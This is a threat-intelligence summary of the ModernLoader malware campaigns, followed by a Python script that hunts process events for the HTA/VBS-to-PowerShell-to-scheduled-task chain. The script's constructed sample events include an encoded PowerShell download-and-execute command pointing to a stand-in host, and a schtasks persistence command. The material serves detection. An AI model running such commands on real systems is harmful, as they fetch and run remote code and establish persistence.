Stormsec

ModernLoader delivers multiple stealers, cryptominers and RATs

Cisco Talos recently observed three separate but related campaigns between March and June 2022 that delivered a variety of threats to victims, including the ModernLoader bot, the RedLine stealer and cryptocurrency-mining malware. The actors used PowerShell, .NET assemblies, and HTA and VBS files to spread across a targeted network, dropping further malware such as the SystemBC trojan and DCRAT to support the different stages of the operation; the final payload was ModernLoader.


REFERENCES: https://raw.githubusercontent.com/Cisco-Talos/IOCs/main/2022/08/modernloader-delivers-multiple-stealers.txt



GROUP: windows


MALWARE FAMILIES: ModernLoader, RedLine


ATT&CK IDS: T1055 - Process Injection, T1027 - Obfuscated Files or Information, T1059.001 - PowerShell, T1053 - Scheduled Task/Job, TA0003 - Persistence, TA0011 - Command and Control, T1088 - Bypass User Account Control (deprecated ID; current ATT&CK tracks this as T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control)
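The delivery chain summarised above (HTA/VBS launchers, PowerShell, scheduled-task persistence) and the technique IDs listed here map onto a small set of process-creation hunts. The script below is an added example written for this page, not Talos code and not drawn from the linked IOC list: it runs three heuristics over constructed Sysmon-style process-creation events (script hosts launching script files, PowerShell spawned by a script host or carrying an encoded command, and schtasks task creation) and tags each hit with the ATT&CK ID it corresponds to. The sample events, paths and the example.invalid URL are constructed for illustration; T1218.005 (Mshta), T1059.005 (Visual Basic) and T1053.005 (Scheduled Task) are the current ATT&CK IDs for the launcher and persistence steps, which the page's list only covers at the parent-technique level.

```python
"""Hunt constructed process-creation events for the ModernLoader-style
delivery chain: HTA/VBS launcher -> PowerShell (often -enc) -> schtasks
persistence. Added example; sample events are constructed, not telemetry
or IOCs from the Talos report."""
import base64
import re

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SCRIPT_EXT_RE = re.compile(r"(?i)\.(?:hta|vbs|vbe|js|jse)\b")
# PowerShell accepts any unambiguous prefix of -EncodedCommand; payload is
# base64 of UTF-16LE text.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
TASK_ACTION_RE = re.compile(r'(?i)/tr\s+("[^"]*"|\S+)')

# Constructed sample events (Sysmon event 1 style). Not real data.
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
SAMPLE_EVENTS = [
    {"pid": 1, "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta.exe C:\Users\u\AppData\Local\Temp\update.hta"},
    {"pid": 2, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + base64.b64encode(_STAGE2.encode("utf-16-le")).decode()},
    {"pid": 3, "image": r"C:\Windows\System32\schtasks.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'schtasks.exe /create /sc minute /mo 5 /tn "Updater" '
                '/tr "wscript.exe C:\\ProgramData\\r.vbs" /f'},
    {"pid": 4, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe Get-ChildItem C:\Users"},  # benign admin use
]


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events):
    """Return (pid, attack_id, description) tuples for matching events."""
    findings = []
    for ev in events:
        img, par, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]

        # Launcher: script host executing an .hta/.vbs/.js file.
        if img in SCRIPT_HOSTS and SCRIPT_EXT_RE.search(cmd):
            tid = "T1218.005" if img == "mshta.exe" else "T1059.005"
            findings.append((ev["pid"], tid, f"{img} launching script file"))

        if img == "powershell.exe":
            # Script host -> PowerShell is the HTA/VBS-to-PowerShell hand-off.
            if par in SCRIPT_HOSTS:
                findings.append((ev["pid"], "T1059.001",
                                 f"PowerShell spawned by script host {par}"))
            decoded = decode_encoded_command(cmd)
            if decoded is not None:
                findings.append((ev["pid"], "T1027",
                                 f"encoded PowerShell: {decoded[:60]}"))

        # Persistence: schtasks /create, report the task action for triage.
        if img == "schtasks.exe" and re.search(r"(?i)/create", cmd):
            action = TASK_ACTION_RE.search(cmd)
            findings.append((ev["pid"], "T1053.005",
                             f"scheduled task created, action {action.group(1) if action else '?'}"))
    return findings


if __name__ == "__main__":
    for pid, tid, desc in analyze(SAMPLE_EVENTS):
        print(f"pid={pid} {tid}: {desc}")
```

Keying each rule on the image name rather than on substrings of the command line keeps the schtasks event from also matching the script-host launcher rule, and the decoder returns None for benign PowerShell so a plain Get-ChildItem (pid 4) produces no finding. Extend the launcher rule with a user-writable-path check (Temp, AppData, ProgramData) before deploying it against real volumes.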

